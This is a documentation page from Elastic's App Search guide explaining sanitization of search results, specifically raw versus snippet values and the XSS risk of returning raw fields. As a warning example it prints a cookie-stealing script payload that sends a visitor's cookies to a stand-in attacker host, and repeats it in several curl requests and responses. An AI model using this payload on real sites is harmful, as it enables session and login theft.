- App Search Guide: other versions:
- Installation
- Getting started
- Authentication
- Limits
- Users and access
- Guides
- Adaptive relevance events logs reference
- Analytics Tags
- Crawl web content
- Crawl a private network using a web crawler on Elastic Cloud
- Crawl custom fields using proxy
- Curations
- Elasticsearch search
- Elasticsearch index engines
- Create Elasticsearch index engines
- Configure dynamic field mappings and analyzers in an Elasticsearch index engine
- Elasticsearch engines text field conventions
- Facets
- Hierarchical Facets
- Indexing Documents
- Language Optimization
- Log settings
- Meta Engines
- Precision tuning (beta)
- Query Suggestions
- Search UI
- Relevance Tuning
- Result Settings
- Result Suggestions
- Role based access control (RBAC)
- Sanitization, Raw or Snippet
- Search
- Synonyms
- View web crawler events logs
- App Search web crawler
- Web crawler FAQ
- Web crawler reference
- Web crawler events logs reference
- API Reference
- Adaptive relevance API reference (beta)
- Analytics APIs
- Analytics clicks API
- Analytics counts API
- Analytics queries API
- API logs API
- Click API
- Credentials API
- Curations API reference
- Documents API
- Elasticsearch search API
- Engines API
- Log settings API
- Multi search API
- Query suggestion API
- Schema API
- Search API
- Search API boosts
- Search API facets
- Search API filters
- Search API group
- Search API precision (beta)
- Search API result fields
- Search API search fields
- Search API sort
- Search API analytics tags
- Search settings API
- Search Explain API
- Source engines API
- Synonyms API
- Web crawler API reference
- API Clients
- Configuration
- Known issues
- Troubleshooting
Sanitization Guide
editSanitization Guide
editA query against your Engine returns documents.
A document, in its tidiest form, looks like so:
{ "nps_link": "https://www.nps.gov/romo/index.htm", "title": "Rocky Mountain", "date_established": "1915-01-26T06:00:00+00:00", "world_heritage_site": "false", "states": [ "Colorado" ], "description": "Bisected north to south by the Continental Divide, this portion of the Rockies has ecosystems varying from over 150 riparian lakes to montane and subalpine forests to treeless alpine tundra. Wildlife including mule deer, bighorn sheep, black bears, and cougars inhabit its igneous mountains and glacial valleys. Longs Peak, a classic Colorado fourteener, and the scenic Bear Lake are popular destinations, as well as the historic Trail Ridge Road, which reaches an elevation of more than 12,000 feet (3,700 m).", "visitors": 4517585, "id": "park_rocky-mountain", "location": "40.4,-105.58", "square_km": 1075.6, "acres": 265795.2 }
It is a classic JSON object with key/value pairs.
When a document is returned via search, the presentation of the values will change depending on how you have parameterized your query.
A very basic query, with no alteration, will return raw values:
{ "nps_link": { "raw": "https://www.nps.gov/romo/index.htm" }, "title": { "raw": "Rocky Mountain" }, "date_established": { "raw": "1915-01-26T06:00:00+00:00" }, "world_heritage_site": { "raw": "false" }, "states": { "raw": [ "Colorado" ] }, "description": { "raw": "Bisected north to south by the Continental Divide, this portion of the Rockies has ecosystems varying from over 150 riparian lakes to montane and subalpine forests to treeless alpine tundra. Wildlife including mule deer, bighorn sheep, black bears, and cougars inhabit its igneous mountains and glacial valleys. Longs Peak, a classic Colorado fourteener, and the scenic Bear Lake are popular destinations, as well as the historic Trail Ridge Road, which reaches an elevation of more than 12,000 feet (3,700 m)." }, "visitors": { "raw": 4517585 }, "id": { "raw": "park_rocky-mountain" }, "location": { "raw": "40.4,-105.58" }, "square_km": { "raw": 1075.6 }, "acres": { "raw": 265795.2 }, "_meta": { "score": 17.739115 } }
A raw value is un-sanitized.
It is an exact representation of the value within a field. And it may be vulnerable to XSS risks!
An enhancement to the basic query is the result_fields
parameter.
It allows one to specify how many characters to return and whether to return a raw or snippet value.
A snippet value can be between 20 and 1000 characters.
A raw value must be at least 20 characters. It does not have an upper bound, apart from the maximum document size.
For demonstration purposes, the following query...
curl -X GET '<ENTERPRISE_SEARCH_BASE_URL>/api/as/v1/engines/national-parks-demo/search' \ -H 'Content-Type: application/json' \ -H 'Authorization: Bearer search-soaewu2ye6uc45dr8mcd54v8' \ -d '{ "query": "rocky mountain national park", "result_fields": { "description": { "raw": { "size": 20 } } } }'
-
will return only one field -
description
- in raw format, which has been chopped due to the"size": 20
parameter:
... { "description": { "raw": "Bisected north to" }, "id": { "raw": "park_rocky-mountain" }, "_meta": { "score": 14.25167 } } ...
Instead of asking for a raw value, we can also request a snippet.
Snippets enhance the user experience by highlighting direct query matches within your results.
They work only on text fields.
And they also act as a sort of preventative measure against Cross-site Scripting (XSS) attacks.
Within your application, it might be the case where you allow users to comment on a product, write articles, or provide status updates.
Perhaps that looks something like this:
curl -X POST 'https://example.com/product/3/comment' \ -H 'Content-Type: application/json' \ -d '{ "comment": "An amazing product!" }'
If the input has not been sanitized, some shady character might take advantage.
They can inject malicious JavaScript alongside the comment...!
This fake script is designed to steal the cookies of a site goer, which the attacker could then use to steal a user’s login or personal information:
+<script>window.location='http://cookiestealer.jerk/?stolencookie='+document.cookie</script>+
curl -X POST 'https://example.com/product/3/comment' \ -H 'Content-Type: application/json' \ -d '{ "comment": "An amazing <script>window.location='http://cookiestealer.jerk/?stolencookie='+document.cookie</script> product!" }'
Now this comment might be sent both to your database and your Engine for searching.
Since you want your comments searchable, the full text value would be indexed — including the malicious JavaScript.
If we were returning raw values, we return the exact contents of the matching document field. And so this...
curl -X POST '<ENTERPRISE_SEARCH_BASE_URL>/api/as/v1/engines/xss-demo/search' \ -H 'Content-Type: application/json' \ -H 'Authorization: Bearer search-7eud55t7ecdmqzcanjsc9cqu' \ -d '{ "query": "amazing", "result_fields": { "comment": { "raw": { "size": 200 } } } }'
... would return this:
... { ... "comment": { "raw": "An amazing <script>window.location='http://cookiestealer.jerk/?stolencookie='+document.cookie</script> product!" } ... } ...
Depending on how you are displaying your search results, this could inject the malicious code into your searcher’s results.
This is dangerous!
A snippet does not have this risk...
curl -X POST '<ENTERPRISE_SEARCH_BASE_URL>/api/as/v1/engines/xss-demo/search' \ -H 'Content-Type: application/json' \ -H 'Authorization: Bearer search-7eud55t7ecdmqzcanjsc9cqu' \ -d '{ "query": "amazing", "result_fields": { "comment": { "snippet": { "size": 200 } } } }'
Which would return this:
{ ... "comment": { "snippet": "An <em>amazing</em> <script>window.location='http://cookiestealer.jerk/?stolencookie='+document.cookie</script> product!" } ... }
Ah-ha! The malicious code has become gibberish. The only browser interpretable result values that snippets return are the <em></em>
tags.
Your moderators can see very quickly that someone is up to no good and you can remove offending documents from your Engine.
While snippets provide some coverage for XSS intrusions, their key purpose is to improve the scan-ability of search results.
Highlighted query matches provide a better user experience. And raw responses are valuable, too.
They should be used, but with caution.
A common case might be injecting raw code into the DOM, returning something such as: href={result.url.raw}
within your results.
We hope the potential risks of accepting un-sanitized raw values is now clear.
Be sure to implement your own mechanism of sanitization!
Equipped with this insight into sanitization, check out the Results Fields API Reference.
ElasticON events are back!
Learn about the Elastic Search AI Platform from the experts at our live events.
Register now